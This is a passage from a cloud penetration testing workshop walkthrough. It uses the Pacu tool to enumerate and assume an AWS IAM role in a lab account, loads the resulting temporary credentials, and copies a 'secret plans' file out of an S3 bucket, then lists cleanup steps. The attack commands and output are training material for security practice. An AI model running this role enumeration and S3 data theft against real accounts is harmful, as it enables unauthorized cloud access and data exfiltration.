(venv) root@588ace135fab:~/pacu# cd /root/pacu (venv) root@588ace135fab:~/pacu# python3 cli.py ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀ ⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧ ⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿ ⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟ ⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁ ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀ ⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀ ⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟ ⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀ Version: 1.5.3 Found existing sessions: [0] New session [1] aviata Choose an option: 1
-
Now that you are in
pacu
let's run the AssumeRole targeting script, specifying the following values: -
The Account Number of
aviata
. - The Wordlist we created in the previous step.
Command Lines
run iam__enum_roles --word-list /root/workdir/wordlist.txt --account-id 97[EXAMPLE]8
Example Output
Pacu (aviata:imported-default) > run iam__enum_roles --word-list /root/workdir/wordlist.txt --account-id 97[EXAMPLE]8 Running module iam__enum_roles... [iam__enum_roles] Warning: This script does not check if the keys you supplied have the correct permissions. Make sure they are allowed to use iam:UpdateAssumeRolePolicy on the role that you pass into --role-name and are allowed to use sts:AssumeRole to try and assume any enumerated roles! [iam__enum_roles] Targeting account ID: 97[EXAMPLE]8 [iam__enum_roles] Starting role enumeration... [iam__enum_roles] Found role: arn:aws:iam::97[EXAMPLE]8:role/aviata [iam__enum_roles] Found 1 role(s): [iam__enum_roles] arn:aws:iam::97[EXAMPLE]8:role/aviata [iam__enum_roles] Checking to see if any of these roles can be assumed for temporary credentials... [iam__enum_roles] Role can be assumed, but hit max session time limit, reverting to minimum of 1 hour... [iam__enum_roles] Successfully assumed role for 1 hour: arn:aws:iam::97[EXAMPLE]8:role/aviata [iam__enum_roles] { "Credentials": { "AccessKeyId": "ASIA[EXAMPLE]PJ", "SecretAccessKey": "WU3[EXAMPLE]Hlq", "SessionToken": "FwoG[EXAMPLE]A==", "Expiration": "2024-04-13 11:35:10+00:00" }, "AssumedRoleUser": { "AssumedRoleId": "AROA[EXAMPLE]HBQY:8Er[EXAMPLE]XkeYk", "Arn": "arn:aws:sts::97[EXAMPLE]8:assumed-role/aviata/8Err[EXAMPLE]eYk" } } Cleaning up the PacuIamEnumRoles-w8Zxb role. ..Pacu (aviata:imported-default) >
-
-
What did
pacu
do? It generated an ASIA (Temporary Access Key) into the AWS Environment. Now that have found a role and generated an AWS Account key for it, let's use it.Command Lines
exit
Command Lines
aws configure --profile aviata
You'll be prompted to supply the
AWS Access Key ID
andAWS Secret Access Key
generated by pacu.Command Lines
aws configure --profile aviata set aws_session_token Fw[EXAMPLE]UGA==
Command Lines
aws sts get-caller-identity --profile aviata
Example Output
(venv) root@588ace135fab:~/pacu# aws configure --profile aviata AWS Access Key ID [None]: ASIA[EXAMPLE]PJ AWS Secret Access Key [None]: WU3[EXAMPLE]Hlq Default region name [us-east-2]: Default output format [None]: (venv) root@588ace135fab:~/pacu# aws configure --profile aviata set aws_session_token FwoG[EXAMPLE]A== (venv) root@588ace135fab:~/pacu# aws sts get-caller-identity --profile aviata { "UserId": "AROA[EXAMPLE]HBQY:8Er[EXAMPLE]XkeYk", "Account": "97[EXAMPLE]8", "Arn": "arn:aws:sts::97[EXAMPLE]8:assumed-role/aviata/8Err[EXAMPLE]eYk" }
-
We now have a role and an identity inside the system. The biggest problem you will have in a penetration test like this is figuring out what permissions you may or may not have. In SEC588 we cover many strategies around this, but due to time constraints in the workshop, we will provide you a path to victory here.
Let's look at AWS S3 Buckets.
Command Lines
aws s3 ls --profile aviata
Example Output
(venv) root@588ace135fab:~/pacu# aws s3 ls --profile aviata 2024-04-12 09:01:44 aviata-tlpred 2024-03-01 12:18:08 cc2024aviatacloud 2024-04-12 16:52:56 dev.aviata.cloud
-
You can look inside whichever bucket you want to within the aviata environment. Only one of the private buckets may be readable. Take a look at the contents of the
aviata-tlpred
.Command Lines
aws s3 ls s3://aviata-tlpred --profile aviata
Example Output
(venv) root@588ace135fab:~/pacu# aws s3 ls s3://aviata-tlpred --profile aviata 2024-04-12 09:01:43 76 secretplans.txt
-
This sounds enticing. Is it a honeypot? Is it a honeytoken? Is it the real data? We may have to chance it. Steal the data and win the prize?
Command Lines
aws s3 cp s3://aviata-tlpred/secretplans.txt /root/workdir/secretplans.txt --profile aviata
Example Output
(venv) root@588ace135fab:~/pacu# aws s3 cp s3://aviata-tlpred/secretplans.txt /root/workdir/secretplans.txt --profile aviata download: s3://aviata-tlpred/secretplans.txt to /root/workdir/secretplans.txt
Success! We've acquired Aviata's secret plans. Let's take a look at them.
Command Lines
cat /root/workdir/secretplans.txt
Example Output
[REDACTED] Aviata's secret plans are too sensitive to include in this document.
Cleanup
-
To properly clean up the environment you can use the following commands from within your docker container.
Start by cleaning up manually created resources.
Command Lines
export INSTANCE=$(aws ec2 describe-instances --filter Name=key-name,Values=attacker-key Name=instance-state-name,Values=running \ --query 'Reservations[].Instances[0].InstanceId' --output text) echo $INSTANCE
aws ec2 terminate-instances --instance-ids $INSTANCE aws ec2 delete-snapshot --snapshot-id $SnapshotId aws ec2 delete-key-pair --key-name attacker-key
-
To clean up your terraform perform the following steps. First, exit the docker container. Then move into the terraform folder and destroy the terraform resources. Finally, delete the docker container.
Command Lines
exit
Command Lines
cd ../terraform
Command Lines
terraform destroy
Command Lines
docker rmi sec588-workshop-container-tools mosesrenegade/sec588-workshop-container-tools
Conclusion
We hope you enjoyed a taste of what the SEC588 Cloud Penetration Testing Course has to offer, it is a multi-faceted look at the world of Attacking the Cloud. While the course covers AWS, as you saw here, it also covers Microsoft Azure, Entra ID, Microsoft Graph, Kubernetes, Docker, and Cloud Native Applications. Join us in the Next Chapter of our ACE135 Workshop with the Class that is the direct opposite of this course, SEC510.